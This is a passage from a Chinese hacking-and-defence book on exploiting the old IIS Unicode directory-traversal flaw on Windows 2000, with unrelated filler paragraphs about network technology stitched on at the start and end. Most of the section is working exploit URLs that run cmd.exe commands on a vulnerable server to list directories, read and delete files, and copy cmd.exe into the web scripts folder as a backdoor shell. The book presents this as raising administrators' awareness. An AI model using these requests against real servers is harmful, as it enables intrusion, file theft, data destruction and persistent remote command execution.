黑客攻防技术内幕-防范入侵的办法(12)

网络技术是从1990年代中期发展起来的新技术，它把互联网上分散的资源融为有机整体，实现资源的全面共享和有机协作，使人们能够透明地使用资源的整体能力并按需获取信息。资源包括高性能计算机、存储资源、数据资源、信息资源、知识资源、专家资源、大型数据库、网络、传感器等。 当前的互联网只限于信息共享，网络则被认为是互联网发展的第三阶段。

6.9 UNICODE漏洞入侵(1)

    

6.9  UNICODE漏洞入侵

风光了很久的UNICODE漏洞是经常被入侵者利用的漏洞之一。在2001年5月1日大战中，黑客们就普遍利用此漏洞对各国网站进行攻击，究其原因：一是由于此漏洞刚公布不久，二是网络安全管理员安全意识低下，对UNICODE漏洞不进行及时的修补，使入侵者通过UNICODE漏洞入侵网站得逞。

但是现在网上还有很多服务器还存在着UNICODE漏洞，此漏洞可以使一般稍懂计算机的人直接通过浏览器，向存有漏洞的服务器发送请求，就可以入侵存有UNICODE漏洞的服务器。

接下来将全面讲述入侵者是如何利用此漏洞对网站进行入侵，也希望可以引起管理员们的安全意识，尽快对UNICODE漏洞进行修补(修补方法请读阅3.7.1 节中UNICODE漏洞的修补)

6.9.1  用于UNICODE漏洞入侵的命令

下面以中文版Windows 2000为例，对于其他版本只需更改其编码即可，参阅3.7.1 节中UNICODE漏洞的修补。

首先将介绍入侵者在入侵存在UNICODE漏洞的服务器时所涉及到的有关命令，其实有些命令和在DOS下使用的命令是一样的，但如CD这一类命令则不可用。

1. dir命令

列出目标计算机的目录。在浏览器的地址栏中输入如下内容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+d:\

或者

http://127.0.0.1/scripts /..%c0%2f../ winnt/system32/cmd.exe?/c+dir+d:\等

以上内容是使用dir命令，让存在UNICODE漏洞的服务器列出d盘的目录，如图6-65所示。

图6-65  使用dir命令，列出d盘的目录

2. 显示下一个目录

这里不使用CD命令 ，而是直接输入路径。如果进入d盘下的Inetpub文件，可在浏览器的地址栏中输入如下内容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+d:\Inetpub

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+d:\Inetpub

如图6-66所示。

图6-66  进入d盘下的Inetpub文件

3. type命令

显示文件内容 。可以在浏览器中显示txt 、htm、 asp等格式的内容，如要显示d盘下config.txt文件的内容，可在浏览器的地址栏中输入如下内容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type +d:\config.txt 

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type +d:\config.txt等

如图6-67所示。

图6-67  使用type命令显示config.txt的内容

4. del命令

删除文件命令。例如，要删除d盘下的config.txt文件，可在浏览器的地址栏中输入如下内容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del +d:\config.txt 

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del +d:\config.txt  等

如图6-68所示。

图6-68  使用del命令删除d盘下config.txt文件

5. copy命令

复制指定文件或同时将该文件改名，例如将d盘Winnt\system32下的cmd.exe程序复制到d盘Inetpub\scripts下，并改名为win.exe，可在浏览器的地址栏中输入如下内容：

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+d:\winnt\system32\cm d.exe d:\inetpub\scripts\win.exe

或者：

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+d:\winnt\system32\cm   d.exe d:\inetpub\scripts\win.exe

如图6-69和6-70所示。

图6-69  改名为win.exe的cmd.exe程序

图6-70  复制cmd.exe程序

从图6-69中可以看到，d盘Winnt\system32下的cmd.exe程序成功地复制到d盘Inetpub\scripts下并改名为win.exe 。

网络的神奇作用吸引着越来越多的用户加入其中，正因如此，网络的承受能力也面临着越来越严峻的考验―从硬件上、软件上、所用标准上......，各项技术都需要适时应势，对应发展，这正是网络迅速走向进步的催化剂。